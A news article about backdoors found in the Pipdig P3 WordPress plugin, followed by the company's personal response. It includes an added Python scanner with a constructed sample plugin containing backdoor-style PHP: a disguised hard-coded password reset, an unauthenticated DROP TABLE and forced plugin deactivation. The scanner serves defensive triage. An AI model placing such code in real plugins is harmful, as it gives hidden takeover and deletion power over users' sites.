Pipdig, a small WordPress theme company, has been at the center of a scandal after multiple reports exposed malicious code additions to its Pipdig Power Pack (P3) plugin.
It all started on Friday, March 29, when Mikey Veenstra, a Wordfence threat analyst, published a report with code examples of the backdoors Pipdig built into its plugin, along with some other unsavory and questionable additions to the code.
“We have confirmed that the plugin, Pipdig Power Pack (or P3), contains code which has been obfuscated with misleading variable names, function names, and comments in order to hide these capabilities,” Veenstra said.
These include an unauthenticated password reset that sets a user's password to a hard-coded string, deliberately obscured with code comments claiming it was added to “check for new social channels to add to the navbar.” Veenstra also demonstrated that the plugin contained code for an unauthenticated database deletion, through which the Pipdig team could remotely destroy any WordPress site running the P3 plugin.
The code for remote site deletion was removed in version 4.8.0, but it is still a concern for users who haven't updated. Michael Waterfall, an iOS engineer at ASOS, tested the “kill switch” function and demonstrated that it still works against prior versions.
Veenstra's investigation also uncovered questionable remote calls in the plugin's cron events, undisclosed content and configuration rewrites, and a list of popular plugins that are deactivated as soon as P3 is activated, without the user's knowledge. He found that some of these plugins are deactivated on the admin_init hook, which runs on every admin page load, so any attempt by the user to reactivate them will not stick.
Wordfence estimates the P3 plugin to have an install base of 10,000-15,000 sites. The changes made in version 4.8.0 of the plugin are not transparently identified in the changelog, so it's not easy for users to know what has changed. The content filtering and the plugin deactivations remain in the most recent release. These kinds of veiled functions, performed without permission, could have unintended consequences for sites using the plugin, which non-technical users may not be able to fix themselves.
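The behaviours described above (a hard-coded password reset with no capability check, destructive SQL, plugin deactivation re-applied on admin_init, and remote calls from cron callbacks) are all things a site owner can triage for with a static scan of a plugin's PHP before trusting it. The following Python script is an added example; it is not code from the article, from Wordfence or from Pipdig, and the plugin source it scans is constructed for this example rather than taken from P3. The hook and function names in the sample (sp_tidy_plugins, sp_hourly_sync and so on) are assumptions. The scanner is a heuristic: it flags capabilities for manual review and will miss anything hidden behind eval(), base64_decode() or string concatenation.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    rule: str       # heuristic that fired
    line: int       # 1-based line in the scanned source
    function: str   # enclosing PHP function, or "<top-level>"


# Textual heuristics only; they will miss code hidden behind eval() or base64.
HOOK_RE = re.compile(r"add_action\(\s*['\"](?P<hook>[\w/]+)['\"]\s*,\s*['\"](?P<cb>\w+)['\"]")
CRON_RE = re.compile(r"wp_schedule_event\([^;]*?['\"](?P<hook>\w+)['\"]\s*\)")
FUNC_RE = re.compile(r"^\s*function\s+(?P<name>\w+)\s*\(")
AUTH_RE = re.compile(r"current_user_can\(|check_admin_referer\(|wp_verify_nonce\(|is_user_logged_in\(")

SENSITIVE = {
    "hardcoded_password_reset": re.compile(r"wp_set_password\(\s*['\"][^'\"]*['\"]"),
    "destructive_sql": re.compile(r"\b(DROP\s+(TABLE|DATABASE)|TRUNCATE\s+TABLE)\b", re.I),
    "plugin_deactivation": re.compile(r"deactivate_plugins\("),
    "remote_call": re.compile(r"wp_remote_(get|post|request)\("),
}


def _functions(lines):
    """Yield (name, start, end) line indexes of top-level PHP functions using a
    brace counter. Good enough for plugin triage; it is not a PHP parser."""
    depth, current, start = 0, None, 0
    for i, line in enumerate(lines):
        m = FUNC_RE.match(line)
        if m and depth == 0:
            current, start = m.group("name"), i
        depth += line.count("{") - line.count("}")
        if current is not None and depth == 0 and "}" in line:
            yield current, start, i
            current = None


def scan_plugin(source: str) -> list[Finding]:
    lines = source.splitlines()
    funcs = {name: (s, e) for name, s, e in _functions(lines)}
    owner = {i: name for name, (s, e) in funcs.items() for i in range(s, e + 1)}
    hooks: dict[str, set[str]] = {}          # callback -> hooks it is attached to
    for m in HOOK_RE.finditer(source):
        hooks.setdefault(m.group("cb"), set()).add(m.group("hook"))
    cron_hooks = {m.group("hook") for m in CRON_RE.finditer(source)}

    findings = []
    for i, line in enumerate(lines):
        fn = owner.get(i, "<top-level>")
        attached = hooks.get(fn, set())
        for rule, rx in SENSITIVE.items():
            if not rx.search(line):
                continue
            # Deactivation on admin_init re-applies on every admin page load;
            # a remote call from a cron callback runs unattended on a schedule.
            if rule == "plugin_deactivation" and "admin_init" in attached:
                rule = "plugin_deactivation_on_admin_init"
            elif rule == "remote_call" and attached & cron_hooks:
                rule = "remote_call_in_cron"
            findings.append(Finding(rule, i + 1, fn))
            # No capability or nonce check anywhere in the same function is the
            # "unauthenticated" pattern the report describes.
            if rule in ("hardcoded_password_reset", "destructive_sql") and fn in funcs:
                s, e = funcs[fn]
                if not AUTH_RE.search("\n".join(lines[s:e + 1])):
                    findings.append(Finding("no_auth_check", i + 1, fn))
    return findings


# Constructed sample plugin for this example; all hook and function names are made up.
SAMPLE_PLUGIN = """<?php
// Constructed sample for this example; not code from any real plugin.
add_action('admin_init', 'sp_tidy_plugins');
add_action('init', 'sp_check_navbar');
add_action('init', 'sp_wipe');
add_action('sp_hourly_sync', 'sp_sync');
wp_schedule_event(time(), 'hourly', 'sp_hourly_sync');
function sp_tidy_plugins() {
    deactivate_plugins(array('other-plugin/other-plugin.php'));
}
function sp_check_navbar() {
    // "check for new social channels to add to the navbar"
    if (isset($_GET['sp_reset'])) {
        wp_set_password('p@ssw0rd-constructed', 1);
    }
}
function sp_wipe() {
    $GLOBALS['wpdb']->query('DROP TABLE wp_options');
}
function sp_sync() {
    $r = wp_remote_get('https://example.invalid/sync');
}
function sp_safe_reset() {
    if (!current_user_can('manage_options')) { return; }
    wp_set_password('x', 1);
}
"""

if __name__ == "__main__":
    print(*scan_plugin(SAMPLE_PLUGIN), sep="\n")
```

To triage a real installation, call scan_plugin() on the contents of each .php file under wp-content/plugins and read every hit in context; the sp_safe_reset function in the sample shows why this is only a starting point, since a capability check silences the no_auth_check rule but leaves the hard-coded password finding, which still needs a human to judge.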
What does Pipdig have to say?
As many people will have most likely seen, there have been various accusations and rumors spreading about PipDig as a company and our products and services.
Initially, I started writing this post to rebuke any comments which have been made against us, for the second time. However, after spending about 4 hours breaking down each point, I’ve decided against it (though I do answer some questions later on in this post). Anything we do/say seems to be fanning the flames to a core group of very angry people. Things have changed over the past 12 hours, taking a turn I never expected from people in our community.
I’m going to try and keep this post as concise as possible. The purpose of this is not to try to purely lay down facts and figures; instead, this is a personal response from me, Phil, as a human being.
The past few days have been some of the worst I have ever encountered. I’ve been awake for pretty much the full 48 hours. Initially, we were able to respond to any comments made on Friday evening, trying to put our side of the story out there. Since then, we took the decision to stay off social media since the attacks on us were becoming more personal and aggressive. Last night, I started to receive death threats from fake accounts on my personal Twitter and Facebook accounts. A small group of people has also started going out of their way to harass our clients, in a hunt to try and hurt us in any way possible, even directly recommending that they open a PayPal claim for work we have done for them.
Pipdig is not a massive, faceless corporation which can deal with this. I’m not ashamed to admit that we simply don’t know how to respond to this situation. In the words of my girlfriend “We’re just 4 people that really love cat memes”. This was probably the only time I had smiled since this whole thing started.
One of the most concerning/upsetting things is the amount of harassment our supporters are receiving. Anyone who has said things along the lines of “I trust Pipdig” or “Let’s at least wait for the facts” has been gunned down with insults and personal attacks on their intelligence. To the people trolling like this, all I can say is please stop and think about what you are doing. To anyone receiving this harassment, please know that we are here for you if you need us.